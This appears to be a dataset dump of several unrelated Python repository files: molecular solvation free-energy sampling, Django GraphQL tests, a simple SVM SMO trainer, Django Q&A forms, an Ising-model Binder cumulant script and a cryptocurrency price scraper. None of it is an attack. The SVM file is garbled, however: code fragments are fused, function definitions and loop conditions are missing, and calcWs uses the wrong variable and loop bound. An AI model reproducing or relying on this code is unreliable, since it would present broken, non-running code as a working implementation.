mbar_from_endpoints(self, xyz_implicit, 
xyz_vacuum):\n \"\"\"Given samples (and simulators) in implicit solvent and vacuum, return\n an MBAR object and the solvation free energy...\"\"\"\n snapshot_list = [xyz_implicit, xyz_vacuum]\n all_snapshots = list(snapshot_list[0]) + list(snapshot_list[1])\n N_k = [len(snapshots) for snapshots in snapshot_list]\n\n u_vacuum = []\n u_implicit = []\n\n for xyz in all_snapshots:\n self.vacuum_sim.context.setPositions(xyz)\n self.implicit_sim.context.setPositions(xyz)\n u_vacuum.append(self.vacuum_sim.context.getState(getEnergy=True).getPotentialEnergy() / kT)\n u_implicit.append(self.implicit_sim.context.getState(getEnergy=True).getPotentialEnergy() / kT)\n u_kn = np.array([u_vacuum, u_implicit])\n # TODO: Do some sort of validation that this is producing\n from pymbar import MBAR\n\n mbar = MBAR(u_kn, N_k)\n return mbar\n\n\n def parse_params(self, params):\n mid = int(len(params) / 2)\n radii_by_type, scales_by_type = params[:mid], params[mid:]\n\n # need radii_by_type and scales_by_type to be iterable\n if len(params) == 2:\n radii_by_type = [radii_by_type]\n scales_by_type = [scales_by_type]\n\n radii = np.zeros(self.n_atoms)\n scales = np.zeros(self.n_atoms)\n for i in range(self.n_atoms):\n radii[i] = radii_by_type[self.type_list[i]]\n scales[i] = scales_by_type[self.type_list[i]]\n\n return radii, scales\n\n def set_obc2_params(self, params):\n \"\"\"Set the obc2 radii and scale factors of the implicit solvent sim\"\"\"\n\n obc2 = [f for f in self.implicit_sim.system.getForces() if 'GBForce' in f.__class__.__name__][0]\n\n radii, scales = self.parse_params(params)\n\n for i in range(self.n_atoms):\n charge, _, scale = obc2.getParticleParameters(i)\n obc2.setParticleParameters(i, (charge, radii[i], scales[i]))\n obc2.updateParametersInContext(self.implicit_sim.context)\n\n def get_perturbed_solvation_free_energy(self, params):\n \"\"\"Use an mbar object to estimate the free energy from radius/scale parameters...\"\"\"\n self.set_obc2_params(params)\n u_perturbed = []\n for xyz in self.all_snapshots:\n self.implicit_sim.context.setPositions(xyz)\n u_perturbed.append(self.implicit_sim.context.getState(getEnergy=True).getPotentialEnergy() / kT)\n u_ln = np.vstack((self.mbar.u_kn, u_perturbed))\n return self.mbar.computePerturbedFreeEnergies(u_ln)[0][0, 2]\n\n# generate a list of all the molecules from the database, and generate a few samples each\nmolecules = []\nfor i in range(len(generated_systems)):\n mol, top, sys, pos = generated_systems[i]\n samples = generated_samples[i]\n molecules.append(Molecule(mol, top, sys, pos,\n #samples['xyz_vacuum'], samples['xyz_implicit'], # don't look at generated samples\n expt=expt_measurements[i][0],\n expt_stdev=expt_measurements[i][1],\n gbsa_forcefield=gbsa_forcefield))\n\ndef get_pred(mp):\n molecule, params = mp\n return molecule.get_perturbed_solvation_free_energy(params)\n\n\ndef log_likelihood(params):\n \"\"\"Gaussian likelihood using experimental mean and standard deviation\"\"\"\n if np.min(params) <= 0:\n return -np.inf\n\n ll_components = np.zeros(len(molecules))\n preds = np.zeros(len(molecules))\n #from multiprocessing import Pool\n #pool = Pool(n_subprocesses)\n #preds = pool.map(get_pred, [(molecule, params) for molecule in molecules])\n\n for i, molecule in enumerate(molecules):\n preds[i] = molecule.get_perturbed_solvation_free_energy(params)\n ll_components[i] = - (preds[i] - molecule.expt) ** 2 / (2 * molecule.expt_stdev ** 2)\n return np.sum(ll_components)\n\nif __name__ == \"__main__\":\n n_dims = len(initial_params)\n\n # 3. 
Sample using emcee\n import emcee\n def run_emcee(lnprobfn):\n nwalkers = n_dims * 2\n sampler = emcee.EnsembleSampler(nwalkers=nwalkers,\n dim=n_dims,\n lnpostfn=lnprobfn, threads=n_subprocesses)\n\n X0 = np.vstack([initial_params + np.random.randn(n_dims)*0.01 for _ in range(nwalkers)])\n sampler.run_mcmc(X0, 1000)\n\n return sampler\n\n print('Running MCMC')\n sampler = run_emcee(log_likelihood)\n\n def save_sampler(sampler, name='sampler_results_{}.npz'.format(n_types)):\n np.savez(name,\n flatchain=sampler.flatchain,\n flatlnprobability=sampler.flatlnprobability,\n acceptance_fraction=sampler.acceptance_fraction,\n )\n save_sampler(sampler)\n","repo_name":"openforcefield/bayes-implicit-solvent","sub_path":"bayes_implicit_solvent/hierarchical_typing/full_experiment.py","file_name":"full_experiment.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"41326468470","text":"import json\nfrom .api import schema\nfrom django.test import TestCase\nfrom graphene.test import Client\nfrom .models import CicReportingTable, CicUsers\nfrom graphene_django.utils.testing import GraphQLTestCase\n\nfilters_query = \"\"\"\n query {\n filters {\n yearMonthList\n tokenNameList\n genderList\n txTypeList\n spendTypeList\n }\n }\n\"\"\"\n\nsummaryData = \"\"\"\nquery summmaryData($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tsummaryData (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n\t\ttotal\n\t start\n\t end\n\t}\n}\n\"\"\"\n\nmonthlyData = \"\"\"\nquery monthlySummaryData($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tmonthlySummaryData (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n\t\tvalue\n\t}\n}\n\"\"\"\n\ncategoryData = \"\"\"\nquery categorySummary ($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tcategorySummary (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n\t\tlabel\n\t\tvalue\n\t}\n}\n\"\"\"\n\nsubtypeData = \"\"\"\nquery summaryDataSubtype($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tsummaryDataSubtype (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n tradeVolumes\n {\n total\n start\n end\n }\n transactionCount\n {\n total\n start\n end\n }\n }\n}\n\"\"\"\n\nbalanceData = \"\"\"\nquery summaryDataBalance($gender:[String]!) {\n\tsummaryDataBalance (gender:$gender) {\n\t\tvalue\n\t}\n}\n\"\"\"\n\ntopTraders = \"\"\"\nquery summaryDataTopTraders($fromDate:String!, $toDate:String!, $tokenName:[String]!,$businessType:[String]!, $gender:[String]!) 
{\n\tsummaryDataTopTraders (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,businessType:$businessType, gender:$gender) {\n\t\tvalue\n\t}\n}\n\"\"\"\n\nsummaryDataQueries = [\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"registeredusers\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"newregisteredusers\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"traders\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"frequenttraders\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount\"}\n]\n\nbalanceDataQueries = [\n\t{\"gender\":[]}\n]\n\nsubtypeDataQueries = [\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"standard\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"disbursements\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"agent_out\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"reclamation\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"unknown\"}\n]\n\nmonthlyDataQueries = [\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-time-spendtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount-time-spendtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-time-gender\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount-time-gender\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-time-txsubtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount-time-txsubtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"registeredusers-cumulative\"},\t \n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"users-time-totalvsfrequent\"}\n]\n\ncategoryDataQueries = [\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-category-spendtype\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", 
\"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-category-gender\"}\n]\n\n\ntopTradersQueries = [\n\t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"businessType\":[], \"gender\":[]}\n]\n\nclass TestAPISchema(GraphQLTestCase):\n\tGRAPHQL_SCHEMA = schema\n\n\tdef setUp(self):\n\t\tself.client = Client(self.GRAPHQL_SCHEMA)\n\t\tCicReportingTable.objects.create(\n\t\t\ttimestamp='2020-01-10 10:00:00',\n\t\t\thash=\"\",\n\t\t\tsource='0x3cc06c32c88aba379c4bbd4c9ebda585d7574bbf',\n\t\t\ts_gender=\"Male\",\n\t\t\ts_business_type=\"Education\",\n\t\t\ts_location=\"\",\n\t\t\ttarget=\"\",\n\t\t\tt_gender=\"\",\n\t\t\tt_business_type=\"Education\",\n\t\t\tt_location=\"\",\n\t\t\tweight=100,\n\t\t\ttokenname=\"Sarafu\",\n\t\t\tupdated='2020-01-10 10:00:00',\n\t\t\ttransfer_subtype=\"STANDARD\",\n\t\t\ttransfer_use=\"\",\n\t\t\taddress=\"\",\n\t\t\trow_created_date = '2020-09-10 10:00:00'\n\t\t\t)\n\n\t\tCicUsers.objects.create(\n\t\t\tcreated = '2020-01-10 10:00:00',\n\t\t\tgender = 'Male',\n\t\t\tlocation = '',\n\t\t\troles = {},\n\t\t\tcurrent_blockchain_address = '0x3cc06c32c88aba379c4bbd4c9ebda585d7574bbf',\n\t\t\tprevious_blockchain_address = '0x3cc06c32c88aba379c4bbd4c9ebda585d7574bbf',\n\t\t\tbusiness_type = 'Labour',\n\t\t\tbal = 4000,\n\t\t\tstart = '2020-01-10 10:00:00',\n\t\t\tlast_send = '2020-01-10 10:00:00',\n\t\t\tdelete_flag = False,\n\t\t\trow_created_date = '2020-09-10 10:00:00'\n\t\t\t)\n\n\n\tdef test_filters_query(self):\n\t\tresponse = self.query(filters_query, op_name = 'filters')\n\t\tcontent = json.loads(response.content)\n\t\t# print(response)\n\t\t# print(content)\n\t\tself.assertResponseNoErrors(response)\t\n\n\tdef test_summaryDataQueries(self):\n\t\tfor query in summaryDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tsummaryData, \n\t\t\t\top_name = 'summmaryData',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\tdef test_monthlyDataQueries(self):\n\t\tfor query in monthlyDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tmonthlyData, \n\t\t\t\top_name = 'monthlySummaryData',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\tdef test_categoryDataQueries(self):\n\t\tfor query in categoryDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tcategoryData, \n\t\t\t\top_name = 'categorySummary',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\n\t\n\tdef test_subtypeDataQueries(self):\n\t\tfor query in subtypeDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tsubtypeData, \n\t\t\t\top_name = 'summaryDataSubtype',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\n\tdef test_balanceDataQueries(self):\n\t\tfor query in balanceDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tbalanceData, \n\t\t\t\top_name = 'summaryDataBalance',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\n\tdef test_topTradersQueries(self):\n\t\tfor query in topTradersQueries:\n\t\t\tresponse = self.query(\n\t\t\t\ttopTraders, 
\n\t\t\t\top_name = 'summaryDataTopTraders',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t","repo_name":"grassrootseconomics/Accapi","sub_path":"API/cicdashboard/graphqlApi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20728331556","text":"# -*- coding:utf-8 -*-\nfrom varibles import *\nfrom numpy import *\nimport matplotlib.pyplot as plt\n\n\ndef loadDataSet(fileName):\n dataMat=[];lableMat=[]\n fr=open(fileName,'r')\n for line in fr.readlines():\n lineArr=line.strip().split('\\t')\n dataMat.append([float(lineArr[0]),float(lineArr[1])])\n lableMat.append(float(lineArr[2]))\n return dataMat,lableMat\n\ndef selectJrand(i,m):\n j=i\n while j==i:\n j=int(random.uniform(0,m))\n return j\n\ndef clipAlpha(alp,H,L):\n if alp>H:\n alp=H\n if alp=alpha>=0\n toler is rongcuolv\n \"\"\" \n dataMatrix=mat(dataMatIn)\n lableMat=mat(classLables).transpose()\n b=0;m,n=shape(dataMatrix)\n alphas=mat(zeros((m,1)))\n iter=0\n while iter=0\n # when inaccuracy is greater than toler(which is rongcuolv) and (alphas[i]>0 or alphas[i]abs(toler) and (alphas[i]0)'\n if ((lableMat[i]*Ei < -toler) and (alphas[i] < C)) or \\\n ((lableMat[i]*Ei > toler) and (alphas[i] > 0)):\n j = selectJrand(i,m)\n fXj = float(multiply(alphas,lableMat).T*(dataMatrix*dataMatrix[j,:].T)) + b\n #Ej>0 when lable[i] is 1 else then lable[i] is-1\n Ej = fXj - float(lableMat[j])\n alphaIold = alphas[i].copy()\n alphaJold = alphas[j].copy()\n # use L and H to modify alphas[j] to an area between 0,c\n # if L==H then continue\n # lableMat[i] != lableMat[j] means i,j are not on the same side of border, use -. 
if equal,use +\n if (lableMat[i] != lableMat[j]):\n L = max(0, alphas[j] - alphas[i])\n H = min(C, C + alphas[j] - alphas[i])\n else:\n L = max(0, alphas[j] + alphas[i] - C)\n H = min(C, alphas[j] + alphas[i])\n # no optimization\n if L == H:\n print(\"L==H\")\n continue \n #Eta is the optimal amount to change alpha[j]\n eta = 2.0 * dataMatrix[i, :]*dataMatrix[j, :].T - dataMatrix[i, :]*dataMatrix[i, :].T - dataMatrix[j, :]*dataMatrix[j, :].T\n #when eta = 0 , calculation of new alpha is too complex for now, so skip it\n if eta >= 0:\n print(\"eta>=0\")\n continue\n #calc it\n alphas[j] -= lableMat[j]*(Ei - Ej)/eta\n # clip it\n alphas[j] = clipAlpha(alphas[j], H, L)\n # if alpha[j] has changed by a small amount\n if (abs(alphas[j] - alphaJold) < 0.00001):\n print(\"j not moving enough\")\n continue\n # change alphas[i] by the same amount of lableMat[j] ,but in the opposite direction\n alphas[i] += lableMat[j]*lableMat[i]*(alphaJold - alphas[j])\n # set the constant term b for these two alphas\n # w= Σ[1~n] ai*yi*xi => b = yj- Σ[1~n] ai*yi(xi*xj)\n # b1 - b = (y1-y) - Σ[1~n] yi*(a1-a)*(xi*x1)\n b1 = b - Ei- lableMat[i]*(alphas[i]-alphaIold)*dataMatrix[i, :]*dataMatrix[i, :].T - lableMat[j]*(alphas[j]-alphaJold)*dataMatrix[i, :]*dataMatrix[j, :].T\n b2 = b - Ej- lableMat[i]*(alphas[i]-alphaIold)*dataMatrix[i, :]*dataMatrix[j, :].T - lableMat[j]*(alphas[j]-alphaJold)*dataMatrix[j, :]*dataMatrix[j, :].T\n if (0 < alphas[i]) and (C > alphas[i]):\n b = b1\n elif (0 < alphas[j]) and (C > alphas[j]):\n b = b2\n else:\n b = (b1 + b2)/2.0\n alphaPairsChanged += 1\n print(\"iter: %d i:%d, pairs changed %d\" % (iter, i, alphaPairsChanged))\n #outside the for loop , if no alpha changed the iter added by 1 ,else set iter to 0\n #if no alpha changed during maxiter ,then while loop end\n if (alphaPairsChanged == 0):\n iter += 1\n else:\n iter = 0\n print(\"iteration number: %d\" % iter)\n return b, alphas\n \ndef calcWs(alphas, dataArr, classLabels): \n X=mat(dataArr)\n lableMat=mat(labelArr).transpose()\n m,n=shape(X)\n w=mat(zeros((n,1)))\n for i in range(n):\n w+=multiply(alphas[i]*lableMat[i],X[i,:].T)\n return w\n\n\ndef plotfig_SVM(xMat, yMat, ws, b, alphas):\n \"\"\"\n 参考地址:\n http://blog.csdn.net/maoersong/article/details/24315633\n http://www.cnblogs.com/JustForCS/p/5283489.html\n http://blog.csdn.net/kkxgx/article/details/6951959\n \"\"\"\n xMat = mat(xMat)\n yMat = mat(yMat)\n\n # b原来是矩阵,先转为数组类型后其数组大小为(1,1),所以后面加[0],变为(1,)\n b = array(b)[0]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n # 注意flatten的用法\n ax.scatter(xMat[:, 0].flatten().A[0], xMat[:, 1].flatten().A[0])\n # x最大值,最小值根据原数据集dataArr[:, 0]的大小而定\n x = arange(-1.0, 10.0, 0.1)\n # 根据x.w + b = 0 得到,其式子展开为w0.x1 + w1.x2 + b = 0, x2就是y值\n y = (-b-ws[0, 0]*x)/ws[1, 0]\n ax.plot(x, y)\n for i in range(shape(yMat[0, :])[1]):\n if yMat[0, i] > 0:\n ax.plot(xMat[i, 0], xMat[i, 1], 'cx')\n else:\n ax.plot(xMat[i, 0], xMat[i, 1], 'kp')\n # 找到支持向量,并在图中标红\n for i in range(100):\n if alphas[i] > 0.0:\n ax.plot(xMat[i, 0], xMat[i, 1], 'ro')\n plt.show()\n\n\nif __name__ == \"__main__\":\n dataArr, labelArr = loadDataSet(inputPath+'/6.SVM/testSet.txt')\n b, alphas = smoSimple(dataArr, labelArr, 0.6, 0.001, 40)\n print('/n/n/n')\n print('b=', b)\n print('alphas=', alphas)\n #alphas[alphas > 0],取数组中大于0的元素 只对numpy 数组可用\n print('alphas[alphas>0]=', alphas[alphas > 0])\n print('shape(alphas[alphas > 0])=', shape(alphas[alphas > 0]))\n for i in range(100):\n if alphas[i] > 0:\n print(dataArr[i], labelArr[i])\n ws = calcWs(alphas, dataArr, labelArr)\n 
plotfig_SVM(dataArr, labelArr, ws, b, alphas)","repo_name":"nekomaycry/python-learning","sub_path":"svm-simple.py","file_name":"svm-simple.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39033609313","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\nfrom .models import Question, Answer, User\n\n\nclass RequiredFieldsMixin():\n\n def __init__(self, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n fields_required = getattr(self.Meta, 'fields_required', None)\n\n if fields_required:\n for key in self.fields:\n if key not in fields_required:\n self.fields[key].required = False\n\n\nclass QuestionAdminForm(forms.ModelForm):\n class Meta:\n model = Question\n fields = {\n 'title',\n 'text',\n 'rating',\n 'author'\n }\n\nclass AnswerAdminForm(forms.ModelForm):\n class Meta:\n model = Answer\n fields = {\n 'text',\n 'author',\n 'question',\n 'rating'\n }\n\nclass AnswerForm(forms.Form):\n text = forms.CharField(widget=forms.Textarea)\n\n def save(self, id, user):\n self.cleaned_data['author'] = user\n self.cleaned_data['question'] = Question.objects.get(id=id)\n post = Answer(**self.cleaned_data)\n post.save()\n return post\n\n\nclass QuestionForm(forms.ModelForm):\n class Meta:\n model = Question\n fields = ['title', 'text']\n\n\nclass CustomUserCreationForm(RequiredFieldsMixin, UserCreationForm):\n class Meta(UserCreationForm):\n model = User\n fields = ['username', 'email', 'first_name', 'second_name', 'userpic']\n fields_required = ['username', 'password']\n\n\nclass CustomUserChangeForm(RequiredFieldsMixin, UserChangeForm):\n class Meta:\n model = User\n fields = ('email', 'first_name', 'second_name', 'userpic')\n fields_required = []\n","repo_name":"typhoonseryi/PythonDjango_NewAsk","sub_path":"qa/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22783026184","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom scipy.optimize import curve_fit\nfrom Metropolis_final import *\n\ndef linear(x,a,b):\n return a*x + b\n\ndef Temp(al, ak, bl, bk):\n return (bl - bk)/(ak - al)\n\ndef DTemp(al, ak, bl, bk, w, dak, dbl, dbk):\n m1 = ((bl/(ak - al))**2)* dbk\n m2 = ((bk/(ak - al))**2)* dbl\n m3 = (((bk-bl)/((ak - al)**2))**2)* w\n m4 = (((bk-bl)/((ak - al)**2))**2)* dak\n return np.sqrt(m1 + m2 + m3 + m4)\n\nMeasurements = 20\nEvents = 3000\nTherm_t = 7000\nDecorr_t = 10\nT_range = np.linspace(2.265, 2.272, num = 8)\n#sets how many binder plots\nL_set = [32, 64]\ncolor_set = ['r', 'b']\ncolor_set_plot = ['red', 'blue']\n#############################\n\n\nA = np.zeros(3)\nB = np.zeros(3)\nDA = np.zeros(3)\nDB = np.zeros(3)\n\nH = 0\nNc = 0\n\nfor L in L_set:\n binder = np.zeros(T_range.shape[0])\n err_binder = np.zeros(T_range.shape[0])\n for mm in range(Measurements):\n if ((mm*100)/Measurements) % 5 == 0: print((mm*100)/Measurements)\n N = 0\n\n for T in T_range:\n\n\n\n S = np.ones((L, L), dtype=int)\n #thermalization\n for tht in range(Therm_t):\n S = metro_swipe(S, T, H)\n\n s_second = 0\n s_fourth = 0\n for ee in range(Events):\n\n m = magnetization(S)\n s_second += m**2\n s_fourth += m**4\n\n\n\n for dct in range(Decorr_t):\n S = metro_swipe(S, T, H)\n\n s_second /= Events\n s_fourth /= Events\n\n\n binder[N] += 1 - ((s_fourth)/(3*(s_second**2)))\n 
err_binder += (1 - ((s_fourth)/(3*(s_second**2))))**2\n N += 1\n\n binder /= Measurements\n err_binder /= Measurements\n err_binder -= binder**2\n err_binder = np.sqrt(err_binder)\n\n plt.errorbar(T_range, binder, yerr = err_binder, fmt = 'o', ecolor = color_set[Nc], label = str(L))\n popt, pcov = curve_fit(linear, T_range, binder)\n plt.plot(T_range, linear(T_range, *popt), color = color_set_plot[Nc])\n\n A[Nc] = popt[0]\n B[Nc] = popt[1]\n DA[Nc] = pcov[0,0]\n DB[Nc] = pcov[1,1]\n\n Nc += 1\n\n\n\n#calculation of Tc (r,g,b)\nprint(\"#################\")\nprint(\"Tc from red and green:\")\nprint(Temp(A[0],A[1],B[0],B[1]),\"±\",DTemp(A[0], A[1], B[0], B[1], DA[0], DA[1], DB[0], DB[1]))\n\"\"\"\"\"\"\"\"\"\nprint(\"Tc from red and blue:\")\nprint(Temp(A[0],A[2],B[0],B[2]),\"±\",DTemp(A[0], A[2], B[0], B[2], DA[0], DA[2], DB[0], DB[2]))\nprint(\"#################\")\nprint(\"Tc from blue and green:\")\nprint(Temp(A[2],A[1],B[2],B[1]),\"±\",DTemp(A[2], A[1], B[2], B[1], DA[2], DA[1], DB[2], DB[1]))\n\"\"\"\"\"\"\"\"\"\"\"\n\n\nplt.legend(loc = 'upper right')\nplt.title(\"Binder Cumulant plot\")\nplt.show()\n","repo_name":"tolios/ising2dnn","sub_path":"programms/binder.py","file_name":"binder.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35322947995","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom time import sleep\nfrom tqdm import tqdm, trange\n\n# new string\nprint('')\n\nfor i in trange(100, colour='#66ff00', desc='Parsing'):\n sleep(.06)\n\ndef parse_btc():\n url = 'https://coinmarketcap.com/currencies/bitcoin/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n btc = soup.find('div', class_='priceValue')\n print(btc.text)\n\ndef parse_eth():\n url = 'https://coinmarketcap.com/currencies/ethereum/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n eth = soup.find('div', class_='priceValue')\n print(eth.text)\n\ndef parse_ltc():\n url = 'https://coinmarketcap.com/currencies/litecoin/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n ltc = soup.find('div', class_='priceValue')\n print(ltc.text)\n\ndef parse_trx():\n url = 'https://coinmarketcap.com/currencies/tron/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n trx = soup.find('div', class_='priceValue')\n print(trx.text)\n\ndef parse_bnb():\n url = 'https://coinmarketcap.com/currencies/bnb/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n bnb = soup.find('div', class_='priceValue')\n print(bnb.text)\n\ndef parse_xrp():\n url = 'https://coinmarketcap.com/currencies/xrp/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n xrp = soup.find('div', class_='priceValue')\n print(xrp.text)\n\ndef parse_sol():\n url = 'https://coinmarketcap.com/currencies/solana/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n sol = soup.find('div', class_='priceValue')\n print(sol.text)\n\ndef parse_doge():\n url = 'https://coinmarketcap.com/currencies/dogecoin/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n doge = soup.find('div', class_='priceValue')\n print(doge.text)\n\ndef parse_ada():\n url = 'https://coinmarketcap.com/currencies/cardano/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n ada = soup.find('div', class_='priceValue')\n print(ada.text)\n\ndef parse_dot():\n url = 'https://coinmarketcap.com/currencies/polkadot-new/'\n r = requests.get(url)\n soup = bs(r.text, 'lxml')\n dot = soup.find('div', class_='priceValue')\n print(dot.text)\n\n\ndef output():\n print('BTC:') \n 
parse_btc()\n\n print('\\nETH:') \n parse_eth()\n\n print('\\nLTC:')\n parse_ltc()\n\n print('\\nTRX:')\n parse_trx()\n\n print('\\nBNB:')\n parse_bnb()\n\n print('\\nXRP:')\n parse_xrp()\n\n print('\\nSOL:')\n parse_sol()\n\n print('\\nDOGE:')\n parse_doge()\n\n print('\\nADA:')\n parse_ada()\n\n print('\\nDOT:')\n parse_dot()\n \n # new str \n print('')\n\noutput() ","repo_name":"johnebon/CryptoParser","sub_path":"parse_crypto.py","file_name":"parse_crypto.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71187324946","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.db import connection\nfrom .forms import PolisForm\nfrom .models import Polis, Service\nimport json\nfrom django.http import JsonResponse\nfrom django.contrib import messages \n\n\n\n# Create your views here.\ndef main_view(request):\n cursor = connection.cursor()\n command = \"\"\" select sk_name from ensurance_polis\"\"\"\n cursor.execute(command)\n sk_names = cursor.fetchall()\n sk_names_filtred = []\n for i in sk_names: #заполняем поле с названиями СК\n target = str(i[0]).lstrip(\"('\").rstrip(\"',)\")\n if target in sk_names_filtred: pass\n else: sk_names_filtred.append(target)\n\n \n return render(request, 'main.html', {'sk_names_filtred':sk_names_filtred})\n\ndef 